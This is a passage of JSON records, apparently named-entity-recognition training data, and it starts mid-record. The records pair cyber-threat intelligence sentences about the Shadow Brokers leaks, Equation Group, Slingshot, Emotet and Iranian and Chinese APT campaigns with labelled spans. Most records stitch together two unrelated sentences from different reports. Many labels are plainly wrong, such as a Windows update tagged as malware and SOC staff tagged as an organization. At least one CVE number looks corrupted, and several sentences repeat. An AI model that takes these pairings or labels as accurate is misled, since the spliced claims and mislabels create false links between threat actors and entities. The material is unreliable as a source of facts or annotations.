The computers of diplomats , military attach\u00e9s , private assistants , secretaries to Prime Ministers , journalists and others are under the concealed control of unknown assailant (s ) .", "spans": [{"start": 86, "end": 97, "label": "Malware"}, {"start": 116, "end": 129, "label": "Malware"}, {"start": 130, "end": 136, "label": "Malware"}, {"start": 156, "end": 165, "label": "Organization"}, {"start": 168, "end": 185, "label": "Organization"}, {"start": 188, "end": 206, "label": "Organization"}, {"start": 209, "end": 220, "label": "Organization"}, {"start": 224, "end": 239, "label": "Organization"}, {"start": 242, "end": 253, "label": "Organization"}]} {"text": "Ordnance will be able to immediately generate shellcode after users provide the IP and Port that the shellcode should connect to or listen on . The banking malware GozNym has legs ; only a few weeks after the hybrid Trojan was discovered , it has reportedly spread into Europe and begun plaguing banking customers in Poland with redirection attacks .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 101, "end": 110, "label": "Malware"}, {"start": 164, "end": 170, "label": "Malware"}, {"start": 216, "end": 222, "label": "Malware"}, {"start": 296, "end": 313, "label": "Organization"}]} {"text": "Therefore , the Stuxnet MOF file creation tool that the Shadow Brokers dropped on Friday is possibly the earliest technical evidence that NSA hackers and developers coded Stuxnet , as many suspect . 
We noted in our original blog the large amount of targeting of Iranian citizens in this campaign , we observed almost one-third of all victims to be Iranian .", "spans": [{"start": 16, "end": 27, "label": "System"}, {"start": 138, "end": 141, "label": "Organization"}, {"start": 171, "end": 178, "label": "System"}, {"start": 270, "end": 278, "label": "Organization"}]} {"text": "Of course , it 's also possible that whatever group The Shadow Brokers have exposed simply gained access to the Stuxnet tools secondhand , and reused them . Since early 2013 , we have observed activity from a unique threat actor group , which we began to investigate based on increased activities against human right activists in the beginning of 2015 .", "spans": [{"start": 112, "end": 125, "label": "System"}, {"start": 317, "end": 326, "label": "Organization"}]} {"text": "That post included download links for a slew of NSA hacking tools and exploits , many of which could be used to break into hardware firewall appliances , and in turn , corporate or government networks . Over the course of three years of observation of campaigns targeting civil society and human rights organizations , from records of well over two hundred spearphishing and other intrusion attempts against individuals inside of Iran and in the diaspora , a narrative of persistent intrusion efforts emerges .", "spans": [{"start": 48, "end": 51, "label": "Organization"}, {"start": 112, "end": 151, "label": "Malware"}, {"start": 168, "end": 200, "label": "Malware"}, {"start": 272, "end": 285, "label": "Organization"}, {"start": 290, "end": 316, "label": "Organization"}, {"start": 446, "end": 454, "label": "Organization"}]} {"text": "Some hackers even went onto use the Cisco exploits in the wild . 
Over the months following the elections , the accounts of Iranians that had been compromised by the actors were then used for spreading the malware .", "spans": [{"start": 36, "end": 50, "label": "Vulnerability"}, {"start": 123, "end": 131, "label": "Organization"}]} {"text": "DanderSpritz consists entirely of plugins to gather intelligence , use exploits and examine already controlled machines . The Infy malware was seen targeting Iranians again in June 2015 , when it was shared with researchers after being sent to a broadcast journalist at BBC Persian with a generic introduction and a PowerPoint presentation attached titled \" Nostalogy \" ( sic ) .", "spans": [{"start": 0, "end": 12, "label": "System"}, {"start": 45, "end": 64, "label": "Malware"}, {"start": 67, "end": 79, "label": "Malware"}, {"start": 84, "end": 119, "label": "Malware"}, {"start": 126, "end": 130, "label": "Malware"}, {"start": 131, "end": 138, "label": "Malware"}, {"start": 158, "end": 166, "label": "Organization"}, {"start": 246, "end": 266, "label": "Organization"}, {"start": 270, "end": 281, "label": "Organization"}, {"start": 316, "end": 326, "label": "System"}]} {"text": "DanderSpritz consists entirely of plugins to gather intelligence , use exploits and examine already controlled machines . 
One narrowly-targeted spearphishing from Infy was sent from the compromised account of a political activist promoting participation inside of Iran , claiming to be a set of images of a British-Iranian dual national that has been held in Evin Prison for five years on espionage charges .", "spans": [{"start": 0, "end": 12, "label": "System"}, {"start": 45, "end": 64, "label": "Malware"}, {"start": 67, "end": 79, "label": "Malware"}, {"start": 84, "end": 119, "label": "Malware"}, {"start": 211, "end": 229, "label": "Organization"}, {"start": 307, "end": 322, "label": "Organization"}]} {"text": "DarkPulsar is a very interesting administrative module for controlling a passive backdoor named ' sipauth32.tsp ' that provides remote control , belonging to this category . As in the past , these messages have been sent accounts believed to be fake and accounts compromised by Infy , including Kurdish activists that had previously been compromised by the Flying Kitten actor group .", "spans": [{"start": 0, "end": 10, "label": "System"}, {"start": 81, "end": 89, "label": "System"}, {"start": 98, "end": 111, "label": "Malware"}, {"start": 295, "end": 312, "label": "Organization"}, {"start": 357, "end": 382, "label": "Organization"}]} {"text": "DanderSpritz is the framework for controlling infected machines , different from FuZZbuNch as the latter provides a limited toolkit for the post-exploitation stage with specific functions such as DisableSecurity and EnableSecurity for DarkPulsar . 
The Windows 10 Creators Update will bring several enhancements to Windows Defender ATP that will provide SOC personnel with options for immediate mitigation of a detected threat .", "spans": [{"start": 0, "end": 12, "label": "System"}, {"start": 81, "end": 90, "label": "System"}, {"start": 196, "end": 211, "label": "System"}, {"start": 216, "end": 230, "label": "System"}, {"start": 235, "end": 245, "label": "System"}, {"start": 252, "end": 278, "label": "Malware"}, {"start": 314, "end": 334, "label": "Organization"}, {"start": 353, "end": 366, "label": "Organization"}]} {"text": "PeddleCheap is a plugin of DanderSpritz which can be used to configure implants and connect to infected machines . LEAD and Barium are not known for large-scale spear-phishing , so it is unlikely that SOC personnel would have to deal with multiple machines having been compromised by these groups at the same time .", "spans": [{"start": 0, "end": 11, "label": "System"}, {"start": 27, "end": 39, "label": "System"}, {"start": 61, "end": 79, "label": "Malware"}, {"start": 84, "end": 112, "label": "Malware"}, {"start": 124, "end": 130, "label": "Organization"}, {"start": 201, "end": 214, "label": "Organization"}]} {"text": "The FuzzBunch and DanderSpritz frameworks are designed to be flexible and to extend functionality and compatibility with other tools . 
While the machine is in isolation , SOC personnel can direct the infected machine to collect live investigation data , such as the DNS cache or security event logs , which they can use to verify alerts , assess the state of the intrusion , and support follow-up actions .", "spans": [{"start": 4, "end": 13, "label": "System"}, {"start": 18, "end": 30, "label": "System"}, {"start": 171, "end": 184, "label": "Organization"}, {"start": 266, "end": 269, "label": "Indicator"}]} {"text": "Each of them consists of a set of plugins designed for different tasks : while FuzzBunch plugins are responsible for reconnaissance and attacking a victim , plugins in the DanderSpritz framework are developed for managing already infected victims . The samples provided were alleged to be targeting Tibetan and Chinese Pro-Democracy Activists .", "spans": [{"start": 79, "end": 96, "label": "System"}, {"start": 117, "end": 147, "label": "Malware"}, {"start": 172, "end": 184, "label": "System"}, {"start": 213, "end": 246, "label": "Malware"}]} {"text": "The leaked NSA documents and tools published in recent months by the mysterious Shadow Brokers group have provided rare insight into the clandestine digital espionage operations pursued by the spy agency over the past few years , including information on operations aimed at Iran and Russia . They are often targeted simultaneously with other ethnic minorities and religious groups in China .", "spans": [{"start": 11, "end": 14, "label": "Organization"}, {"start": 193, "end": 203, "label": "Organization"}, {"start": 343, "end": 360, "label": "Organization"}, {"start": 365, "end": 381, "label": "Organization"}]} {"text": "Yet the document cache published April 8 provides evidence that the NSA had once launched a series of successful computer-based intrusions against multiple high-profile foreign targets , including the Office of the President of Iran and the Russian Federal Nuclear Center . 
Examples as early as 2008 document malware operations against Tibetan non-governmental organizations ( NGOs ) that also targeted Falun Gong and Uyghur groups .", "spans": [{"start": 68, "end": 71, "label": "Organization"}, {"start": 300, "end": 316, "label": "Indicator"}, {"start": 336, "end": 374, "label": "Organization"}, {"start": 377, "end": 381, "label": "Organization"}, {"start": 403, "end": 413, "label": "Organization"}, {"start": 418, "end": 431, "label": "Organization"}]} {"text": "The ShadowBrokers' latest dump of Equation Group hacks focuses on UNIX systems and GSM networks , and was accompanied by an open letter to President Trump . Unit 42 recently identified a targeted attack against an individual working for the Foreign Ministry of Uzbekistan in China .", "spans": [{"start": 157, "end": 164, "label": "Organization"}, {"start": 241, "end": 257, "label": "Organization"}]} {"text": "Numerous Windows hacking tools are also among the new batch of files the Shadow Brokers dumped Friday . NetTraveler has been used to target diplomats , embassies and government institutions for over a decade , and remains the tool of choice by the adversaries behind these cyber espionage campaigns .", "spans": [{"start": 9, "end": 30, "label": "System"}, {"start": 104, "end": 115, "label": "Malware"}, {"start": 140, "end": 149, "label": "Organization"}, {"start": 152, "end": 161, "label": "Organization"}, {"start": 166, "end": 189, "label": "Organization"}]} {"text": "The leaked files show the NSA was allegedly targeting EastNets in Dubai , Belgium , and Egypt . 
The NetTraveler group has infected victims across multiple establishments in both the public and private sector including government institutions , embassies , the oil and gas industry , research centers , military contractors and activists .", "spans": [{"start": 26, "end": 29, "label": "Organization"}, {"start": 54, "end": 62, "label": "Organization"}, {"start": 218, "end": 241, "label": "Organization"}, {"start": 244, "end": 253, "label": "Organization"}, {"start": 260, "end": 280, "label": "Organization"}, {"start": 302, "end": 322, "label": "Organization"}, {"start": 327, "end": 336, "label": "Organization"}]} {"text": "The files appear to include logs from 2013 that show the NSA was also targeting oil and investment companies across the Middle East . The main point that sets Operation Groundbait apart from the other attacks is that it has mostly been targeting anti-government separatists in the self-declared Donetsk and Luhansk People 's Republics .", "spans": [{"start": 57, "end": 60, "label": "Organization"}, {"start": 80, "end": 83, "label": "Organization"}, {"start": 88, "end": 108, "label": "Organization"}, {"start": 246, "end": 273, "label": "Organization"}]} {"text": "According to Kaspersky , the Equation Group has more than 60 members and has been operating since at least 2001 . Although Silence 's phishing emails were also sent to bank employees in Central and Western Europe , Africa , and Asia ) .", "spans": [{"start": 13, "end": 22, "label": "Organization"}, {"start": 143, "end": 149, "label": "System"}, {"start": 168, "end": 182, "label": "Organization"}]} {"text": "The existence of the Equation Group was first posited in Feb. 2015 by researchers at Russian security firm Kaspersky Lab , which described it as one of the most sophisticated cyber attack teams in the world . 
They tried new techniques to steal from banking systems , including AWS CBR ( the Russian Central Bank 's Automated Workstation Client ) , ATMs , and card processing .", "spans": [{"start": 93, "end": 106, "label": "Organization"}, {"start": 107, "end": 120, "label": "Organization"}, {"start": 299, "end": 343, "label": "Organization"}, {"start": 348, "end": 352, "label": "Organization"}]} {"text": "Most of the Equation Group 's targets have been in Iran , Russia , Pakistan , Afghanistan , India , Syria , and Mali . However , some phishing emails were sent to bank employees in more than 25 countries of Central and Western Europe , Africa and Asia including : Kyrgyzstan , Armenia , Georgia , Serbia , Germany , Latvia , Czech Republic , Romania , Kenya , Israel , Cyprus , Greece , Turkey , Taiwan , Malaysia , Switzerland , Vietnam , Austria , Uzbekistan , Great Britain , Hong Kong , and others .", "spans": [{"start": 12, "end": 26, "label": "Organization"}, {"start": 143, "end": 149, "label": "System"}, {"start": 163, "end": 177, "label": "Organization"}]} {"text": "According to Wikipedia , the CSS was formed in 1972 to integrate the NSA and the Service Cryptologic Elements ( SCE ) of the U.S armed forces . An interesting point in the Silence attack is that the cybercriminals had already compromised banking infrastructure in order to send their spear-phishing emails from the addresses of real bank employees and look as unsuspicious as possible to future victims .", "spans": [{"start": 238, "end": 245, "label": "Organization"}, {"start": 299, "end": 305, "label": "System"}, {"start": 333, "end": 347, "label": "Organization"}]} {"text": "KrebsOnSecurity was first made aware of the metadata in the Shadow Brokers leak by Mike Poor , Rob Curtinseufert , and Larry Pesce . 
A preliminary analysis caught the attention of our Threat Analysis and Intelligence team as it yielded interesting data that , among other things , shows that Silence was targeting employees from financial entities , specifically in the Russian Federation and the Republic of Belarus .", "spans": [{"start": 0, "end": 15, "label": "Organization"}, {"start": 60, "end": 74, "label": "Organization"}, {"start": 314, "end": 323, "label": "Organization"}, {"start": 329, "end": 347, "label": "Organization"}]} {"text": "In their latest leak , they have released the UNITEDRAKE NSA exploit , which is a remote access and control tool that can remotely target Windows-based systems to capture desired information and transfer it to a server . While the Sima moniker could similarly originate from software labels , it is a common female Persian name and a Persian-language Word for \" visage \" or \" appearance \" . Given its use in more advanced social engineering campaigns against women 's rights activists , the label seem particularly apt .", "spans": [{"start": 46, "end": 68, "label": "Vulnerability"}, {"start": 163, "end": 190, "label": "Malware"}, {"start": 195, "end": 203, "label": "Malware"}, {"start": 351, "end": 355, "label": "System"}, {"start": 422, "end": 450, "label": "Organization"}, {"start": 459, "end": 484, "label": "Organization"}]} {"text": "The ShadowBrokers is a group of hackers known for leaking exclusive information about the National Security Agency \u2013 NSA 's hacking tools and tactics . 
Samples and resource names contained the family names of prominent Iranians , and several of these individuals received the malware located in their respective folder .", "spans": [{"start": 4, "end": 17, "label": "Organization"}, {"start": 117, "end": 120, "label": "Organization"}, {"start": 219, "end": 227, "label": "Organization"}]} {"text": "It captures information using plugins to compromise webcam and microphone output along with documenting log keystrokes , carrying out surveillance and access external drives . For the sake of narrative we are going to focus exclusively to those samples we identified being used in attacks against Iranian civil society and diaspora .", "spans": [{"start": 3, "end": 23, "label": "Malware"}, {"start": 121, "end": 146, "label": "Malware"}, {"start": 151, "end": 173, "label": "Malware"}, {"start": 305, "end": 318, "label": "Organization"}, {"start": 323, "end": 331, "label": "Organization"}]} {"text": "UNITEDRAKE is described as a \" fully extensible \" data collection tool that is specifically developed for Windows machines to allow operators the chance of controlling a device completely . After reviewing all the malware functionalities , we are confident in saying that the attackers look for victims who answer well-defined characteristics and believe that further stages of the attack are delivered only to those who fit the specific victim profile .", "spans": [{"start": 0, "end": 10, "label": "System"}, {"start": 276, "end": 285, "label": "Organization"}, {"start": 295, "end": 313, "label": "Organization"}]} {"text": "On the other hand , ShadowBrokers group made headlines in 2016 when it claimed to have robbed various exploitation tools used by the NSA including the notorious ETERNALBLUE that was a vital component in the WannaCry ransomware campaign causing damages to systems worldwide . 
It's coincident that both 'darkhydrus' APT group name and \u2018Williams\u2019 user name in PDB path found in this Twitter user .", "spans": [{"start": 133, "end": 136, "label": "Organization"}, {"start": 161, "end": 172, "label": "Vulnerability"}, {"start": 301, "end": 313, "label": "Organization"}, {"start": 333, "end": 343, "label": "Organization"}, {"start": 380, "end": 392, "label": "Organization"}]} {"text": "This turned out to be a malicious loader internally named ' Slingshot ' , part of a new , and highly sophisticated attack platform that rivals Project Sauron and Regin in complexity . The 360 Intelligence Center observed four distinct campaigns against Pakistan since 2017 (link) , recently targeting Pakistani businessmen working in China .", "spans": [{"start": 60, "end": 69, "label": "System"}, {"start": 143, "end": 157, "label": "System"}, {"start": 162, "end": 167, "label": "System"}, {"start": 301, "end": 322, "label": "Organization"}]} {"text": "One of them \u2013 ipv4.dll \u2013 has been placed by the APT with what is , in fact , a downloader for other malicious components . In the latest attack , Donot group is targeting Pakistani businessman working in China", "spans": [{"start": 14, "end": 22, "label": "Malware"}, {"start": 79, "end": 89, "label": "System"}, {"start": 146, "end": 157, "label": "Organization"}, {"start": 171, "end": 192, "label": "Organization"}]} {"text": "To run its code in kernel mode in the most recent versions of operating systems , that have Driver Signature Enforcement , Slingshot loads signed vulnerable drivers and runs its own code through their vulnerabilities . 
A previous , removed , report from another vendor claimed non-specific information about the groups' interest in Chinese universities , but that report has been removed \u2013 most likely detections were related to students\u2019 and researchers\u2019 scanning known collected samples and any incidents\u201d remain unconfirmed and unknown .", "spans": [{"start": 123, "end": 132, "label": "System"}, {"start": 312, "end": 319, "label": "Organization"}, {"start": 332, "end": 352, "label": "Organization"}]} {"text": "During our research we also found a component called KPWS that turned out to be another downloader for Slingshot components . The most popular targets of SneakyPastes are embassies , government entities , education , media outlets , journalists , activists , political parties or personnel , healthcare and banking .", "spans": [{"start": 53, "end": 57, "label": "System"}, {"start": 103, "end": 112, "label": "System"}, {"start": 154, "end": 166, "label": "Organization"}, {"start": 171, "end": 180, "label": "Organization"}, {"start": 183, "end": 202, "label": "Organization"}, {"start": 205, "end": 214, "label": "Organization"}, {"start": 217, "end": 230, "label": "Organization"}, {"start": 247, "end": 256, "label": "Organization"}, {"start": 280, "end": 289, "label": "Organization"}, {"start": 292, "end": 302, "label": "Organization"}, {"start": 307, "end": 314, "label": "Organization"}]} {"text": "Written in pure C language , Canhadr/Ndriver provides full access to the hard drive and operating memory despite device security restrictions , and carries out integrity control of various system components to avoid debugging and security detection . 
Through our continuous monitoring of threats during 2018 , we observed a new wave of attacks by Gaza Cybergang Group1 targeting embassies and political personnel .", "spans": [{"start": 29, "end": 44, "label": "Malware"}, {"start": 45, "end": 65, "label": "Malware"}, {"start": 148, "end": 177, "label": "Malware"}, {"start": 347, "end": 368, "label": "Organization"}, {"start": 379, "end": 388, "label": "Organization"}, {"start": 393, "end": 412, "label": "Organization"}]} {"text": "The toolset includes reams of documentation explaining how the cyber weapons work , as well as details about their use in highly classified intelligence operations abroad . This could include diplomats , experts in the LOCs of interest related to the Digital Economy Task Force , or possibly even journalists .", "spans": [{"start": 44, "end": 76, "label": "Malware"}, {"start": 192, "end": 201, "label": "Organization"}, {"start": 297, "end": 308, "label": "Organization"}]} {"text": "So far , researchers have seen around 100 victims of Slingshot and its related modules , located in Kenya , Yemen , Afghanistan , Libya , Congo , Jordan , Turkey , Iraq , Sudan , Somalia and Tanzania . This focus on training aligns with LYCEUM\u2019s targeting of executives , HR staff , and IT personnel .", "spans": [{"start": 53, "end": 62, "label": "System"}, {"start": 237, "end": 245, "label": "Organization"}, {"start": 259, "end": 269, "label": "Organization"}, {"start": 272, "end": 280, "label": "Organization"}, {"start": 287, "end": 299, "label": "Organization"}]} {"text": "Some of the techniques used by Slingshot , such as the exploitation of legitimate , yet vulnerable drivers has been seen before in other malware , such as White and Grey Lambert . 
Despite the initial perception that the maldoc sample was intended for ICS or OT staff , LYCEUM has not demonstrated an interest in those environments .", "spans": [{"start": 31, "end": 40, "label": "System"}, {"start": 155, "end": 160, "label": "System"}, {"start": 165, "end": 177, "label": "System"}, {"start": 220, "end": 226, "label": "Malware"}, {"start": 251, "end": 254, "label": "Organization"}, {"start": 258, "end": 266, "label": "Organization"}, {"start": 269, "end": 275, "label": "Organization"}]} {"text": "Cylance tracks this threat group internally as ' Snake Wine ' . The threat actor\u2019s emails usually contain a picture or a link without a malicious payload and are sent out to a huge recipient database of up to 85 , 000 users .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 49, "end": 59, "label": "Organization"}, {"start": 75, "end": 82, "label": "Organization"}, {"start": 83, "end": 89, "label": "System"}, {"start": 136, "end": 153, "label": "Indicator"}, {"start": 218, "end": 223, "label": "Organization"}]} {"text": "To date , all observed Snake Wine 's attacks were the result of spear phishing attempts against the victim organizations . Group-IB specialists determined that the email addresses of IT bank employees were among the recipients of these emails .", "spans": [{"start": 23, "end": 33, "label": "Organization"}, {"start": 123, "end": 131, "label": "Organization"}, {"start": 164, "end": 169, "label": "System"}, {"start": 186, "end": 190, "label": "Organization"}, {"start": 191, "end": 200, "label": "Organization"}, {"start": 236, "end": 242, "label": "System"}]} {"text": "The Ham Backdoor functions primarily as a modular platform , which provides the attacker with the ability to directly download additional modules and execute them in memory from the command and control ( C2 ) server . 
While OceanLotus\u2019 targets are global , their operations are mostly active within the APAC region which encompasses targeting private sectors across multiple industries , foreign governments , activists , and dissidents connected to Vietnam .", "spans": [{"start": 4, "end": 16, "label": "System"}, {"start": 118, "end": 145, "label": "Malware"}, {"start": 224, "end": 235, "label": "Organization"}, {"start": 388, "end": 407, "label": "Organization"}, {"start": 410, "end": 419, "label": "Organization"}, {"start": 426, "end": 436, "label": "Organization"}]} {"text": "Based upon Cylance 's observations , the Tofu Backdoor was deployed in far fewer instances than the Ham Backdoor . The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East .", "spans": [{"start": 11, "end": 18, "label": "Organization"}, {"start": 41, "end": 54, "label": "System"}, {"start": 100, "end": 112, "label": "System"}, {"start": 119, "end": 128, "label": "Organization"}, {"start": 143, "end": 149, "label": "System"}, {"start": 175, "end": 184, "label": "Indicator"}, {"start": 188, "end": 227, "label": "Organization"}]} {"text": "This suggests that the Snake Wine group will likely continue to escalate their activity and persistently target both private and government entities within Japan . Examples as early as 2008 document malware operations against Tibetan non-governmental organizations ( NGOs ) that also targeted Falun Gong and Uyghur groups .", "spans": [{"start": 129, "end": 148, "label": "Organization"}, {"start": 190, "end": 206, "label": "Indicator"}, {"start": 226, "end": 264, "label": "Organization"}, {"start": 267, "end": 271, "label": "Organization"}, {"start": 293, "end": 303, "label": "Organization"}, {"start": 308, "end": 321, "label": "Organization"}]} {"text": "The group was first publicly disclosed by FireEye in this report . 
The document exploited CVE-2012-0158 and will decode and write an executable to disk upon infection .", "spans": [{"start": 42, "end": 49, "label": "Organization"}, {"start": 90, "end": 103, "label": "Vulnerability"}]} {"text": "MenuPass is a well-documented CN-APT group , whose roots go back to 2009 . iSiGHT Partners has tracked Sandworm Team for some time - and we publicly reported on some of their activities in October 2014 , when we discovered their use of a zero-day exploit , CVE-2014-4114 .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 75, "end": 90, "label": "Organization"}, {"start": 103, "end": 116, "label": "Organization"}, {"start": 238, "end": 246, "label": "Vulnerability"}, {"start": 247, "end": 254, "label": "Vulnerability"}, {"start": 257, "end": 270, "label": "Vulnerability"}]} {"text": "Snake Wine was first publicly disclosed by FireEye in this report . In July of 2015 , we identified a full e-mail uploaded to an antivirus scanning service that carried a Scarlet Mimic exploit document .", "spans": [{"start": 43, "end": 50, "label": "Organization"}, {"start": 107, "end": 113, "label": "System"}, {"start": 171, "end": 184, "label": "System"}, {"start": 185, "end": 192, "label": "Vulnerability"}]} {"text": "Although the MenuPass Group used mostly publicly available RATs , they were successful in penetrating a number of high value targets , so it is entirely possible this is indeed a continuation of past activity . The group uses legitimate administration tools to fly under the radar in their post-exploitation phase , which makes detection of malicious activity , as well as attribution more complicated .", "spans": [{"start": 40, "end": 63, "label": "System"}]} {"text": "Also of particular interest was the use of a domain hosting company that accepts BTC and was previously heavily leveraged by the well-known Russian group APT28 . 
Through the exploitation of the HTA handler vulnerability described in CVE-2017-1099 , the observed RTF attachments download .", "spans": [{"start": 45, "end": 67, "label": "Organization"}, {"start": 154, "end": 159, "label": "Organization"}, {"start": 233, "end": 246, "label": "Vulnerability"}, {"start": 262, "end": 265, "label": "System"}]} {"text": "Germany 's Der Spiegel re-published the slide set with far less deletions recently , in January 2015 , and therefore gave a deeper insight about what CSEC actually says they have tracked down . In early May , the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE-2017-0199 .", "spans": [{"start": 11, "end": 22, "label": "Organization"}, {"start": 238, "end": 241, "label": "System"}, {"start": 273, "end": 282, "label": "Organization"}, {"start": 283, "end": 290, "label": "System"}, {"start": 318, "end": 331, "label": "Vulnerability"}]} {"text": "According to slide 22 , \" CSEC assesses , with moderate certainty , SNOWGLOBE to be a state-sponsored Cyber Network Operation effort , put forth by a French intelligence agency \" . As early as March 4 , 2017 , malicious documents exploiting CVE-2017-0199 were used to deliver the LATENTBOT malware .", "spans": [{"start": 210, "end": 229, "label": "Indicator"}, {"start": 241, "end": 254, "label": "Vulnerability"}, {"start": 280, "end": 289, "label": "Malware"}, {"start": 290, "end": 297, "label": "Malware"}]} {"text": "The information given dates back to 2011 and nothing else has been published since . 
FireEye believes that two actors \u2013 Turla and an unknown financially motivated actor \u2013 were using the first EPS zero-day CVE-2017-0261 , and APT28 was using the second EPS zero-day CVE-2017-0262 along with a new Escalation of Privilege (EOP) zero-day CVE-2017-0263 .", "spans": [{"start": 85, "end": 92, "label": "Organization"}, {"start": 111, "end": 117, "label": "Organization"}, {"start": 120, "end": 125, "label": "Organization"}, {"start": 141, "end": 152, "label": "Organization"}, {"start": 196, "end": 204, "label": "Vulnerability"}, {"start": 205, "end": 218, "label": "Vulnerability"}, {"start": 225, "end": 230, "label": "Organization"}, {"start": 256, "end": 264, "label": "Vulnerability"}, {"start": 265, "end": 278, "label": "Vulnerability"}, {"start": 326, "end": 334, "label": "Vulnerability"}, {"start": 335, "end": 348, "label": "Vulnerability"}]} {"text": "Now that specific Babar samples have been identified and analyzed , there might be new information , also with regards to similarities or differences between the two Remote Administration Tools ( RATs ) EvilBunny and Babar . The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME .", "spans": [{"start": 18, "end": 31, "label": "System"}, {"start": 166, "end": 193, "label": "System"}, {"start": 196, "end": 200, "label": "System"}, {"start": 203, "end": 212, "label": "System"}, {"start": 217, "end": 222, "label": "System"}, {"start": 237, "end": 254, "label": "Indicator"}, {"start": 305, "end": 318, "label": "Vulnerability"}, {"start": 424, "end": 431, "label": "Indicator"}]} {"text": "We recommend reading Marion 's report \" Shooting Elephants \" , a complementary piece of work regarding the Babar malware . 
This vulnerability was found in a document named Trump's_Attack_on_Syria_English.docx .", "spans": [{"start": 107, "end": 120, "label": "System"}, {"start": 172, "end": 208, "label": "Indicator"}]} {"text": "And finally , as every elephant , Babar has big ears and the malware is able to listen to conversations and log them by using the dsound and winmm libraries . It is possible that CVE-2017-8759 was being used by additional actors .", "spans": [{"start": 34, "end": 39, "label": "System"}, {"start": 130, "end": 136, "label": "System"}, {"start": 141, "end": 156, "label": "System"}, {"start": 179, "end": 192, "label": "Vulnerability"}, {"start": 222, "end": 228, "label": "Organization"}]} {"text": "The G DATA SecurityLabs are convinced that the number of similarities identified between EvilBunny and Babar show that both malware families originate from the same developers . The addition of the EternalBlue exploit to Metasploit has made it easy for threat actors to exploit these vulnerabilities .", "spans": [{"start": 4, "end": 23, "label": "Organization"}, {"start": 89, "end": 98, "label": "System"}, {"start": 103, "end": 108, "label": "System"}, {"start": 198, "end": 209, "label": "Vulnerability"}, {"start": 210, "end": 217, "label": "Vulnerability"}, {"start": 221, "end": 231, "label": "Malware"}, {"start": 260, "end": 266, "label": "Organization"}, {"start": 270, "end": 277, "label": "Vulnerability"}]} {"text": "TA542 , the primary actor behind Emotet , is known for the development of lures and malicious mail specific to given regions . 
The Magnitude EK landing page consisted of CVE-2016-0189 , which was first reported by FireEye as being used in Neutrino Exploit Kit after it was patched .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 33, "end": 39, "label": "System"}, {"start": 131, "end": 143, "label": "Malware"}, {"start": 170, "end": 183, "label": "Vulnerability"}, {"start": 214, "end": 221, "label": "Organization"}, {"start": 239, "end": 259, "label": "Malware"}]} {"text": "While discussions of threats in this region often focus on \" North America \" generally or just the United States , nearly 100 campaigns during this period were either specifically targeted at Canadian organizations or were customized for Canadian audiences . The malware leverages an exploit , codenamed EternalBlue , that was released by the Shadow Brokers on April 14 , 2017 .", "spans": [{"start": 247, "end": 256, "label": "Organization"}, {"start": 284, "end": 291, "label": "Vulnerability"}, {"start": 304, "end": 315, "label": "Vulnerability"}, {"start": 343, "end": 357, "label": "Organization"}]} {"text": "Emotet is a type of general-purpose malware that evolved from a well-known banking Trojan , \" Cridex \" , which was first discovered in 2014 . Some hackers even went onto use the Cisco exploits in the wild .", "spans": [{"start": 0, "end": 6, "label": "System"}, {"start": 75, "end": 89, "label": "System"}, {"start": 94, "end": 100, "label": "System"}, {"start": 178, "end": 183, "label": "Organization"}, {"start": 184, "end": 192, "label": "Vulnerability"}]} {"text": "While discussions of threats in this region often focus on \" North America \" generally or just the United States , nearly 100 campaigns during this period were either specifically targeted at Canadian organizations or were customized for Canadian audiences . 
DanderSpritz is the framework for controlling infected machines , different from FuZZbuNch as the latter provides a limited toolkit for the post-exploitation stage with specific functions such as DisableSecurity and EnableSecurity for DarkPulsar .", "spans": [{"start": 247, "end": 256, "label": "Organization"}, {"start": 259, "end": 271, "label": "Malware"}, {"start": 340, "end": 349, "label": "Malware"}, {"start": 455, "end": 470, "label": "Malware"}, {"start": 475, "end": 489, "label": "Malware"}, {"start": 494, "end": 504, "label": "Malware"}]} {"text": "Emotet activity in 2019 included several high-volume campaigns that collectively distributed tens of millions of messages primarily targeting the manufacturing and healthcare industries . In their latest leak , they have released the UNITEDRAKE NSA exploit , which is a remote access and control tool that can remotely target Windows-based systems to capture desired information and transfer it to a server .", "spans": [{"start": 146, "end": 159, "label": "Organization"}, {"start": 164, "end": 185, "label": "Organization"}, {"start": 234, "end": 248, "label": "System"}, {"start": 249, "end": 256, "label": "Vulnerability"}, {"start": 326, "end": 339, "label": "System"}]} {"text": "Originally targeting Western European banks , Emotet has since been developed into a robust global botnet that is comprised of several modules , each of which equips Emotet with different spamming , email logging , information stealing , bank fraud , downloading , and DDoS , among others . 
On the other hand , ShadowBrokers group made headlines in 2016 when it claimed to have robbed various exploitation tools used by the NSA including the notorious EternalBlue that was a vital component in the WannaCry ransomware campaign causing damages to systems worldwide .", "spans": [{"start": 38, "end": 43, "label": "Organization"}, {"start": 46, "end": 52, "label": "System"}, {"start": 166, "end": 172, "label": "System"}, {"start": 199, "end": 212, "label": "Malware"}, {"start": 215, "end": 235, "label": "Malware"}, {"start": 238, "end": 248, "label": "Malware"}, {"start": 251, "end": 262, "label": "Malware"}, {"start": 269, "end": 273, "label": "Malware"}, {"start": 424, "end": 427, "label": "Organization"}, {"start": 452, "end": 463, "label": "Vulnerability"}]} {"text": "Originally targeting Western European banks , it has since been developed into a robust global botnet that is comprised of several modules , each of which equips Emotet with different spamming , email logging , information stealing , bank fraud , downloading , and DDoS , among others . In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload .", "spans": [{"start": 38, "end": 43, "label": "Organization"}, {"start": 162, "end": 168, "label": "System"}, {"start": 195, "end": 208, "label": "Malware"}, {"start": 211, "end": 231, "label": "Malware"}, {"start": 234, "end": 244, "label": "Malware"}, {"start": 247, "end": 258, "label": "Malware"}, {"start": 265, "end": 269, "label": "Malware"}, {"start": 294, "end": 300, "label": "System"}, {"start": 315, "end": 335, "label": "Organization"}, {"start": 377, "end": 410, "label": "Indicator"}, {"start": 430, "end": 443, "label": "Vulnerability"}]} {"text": "Beginning in mid-January 2019 , TA542 distributed millions of Emotet-laden emails in both English and German . 
